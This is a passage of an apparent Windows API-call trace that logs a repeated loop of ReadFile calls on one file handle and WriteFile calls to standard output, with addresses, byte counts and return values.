[0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.846] SetFilePointerEx (in: hFile=0x58, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.846] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, 
lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.847] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 
[0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.849] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=4) returned 0x58 
[0129.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.850] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, 
lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.852] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] GetFileType (hFile=0x50) returned 0x1 [0129.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.852] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 
0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.853] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] GetFileType (hFile=0x50) returned 0x1 [0129.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.853] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) 
returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.854] GetFileType (hFile=0x50) returned 0x1 [0129.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0129.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.855] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.855] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] GetFileType (hFile=0x50) returned 0x1 [0129.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.856] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.856] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, 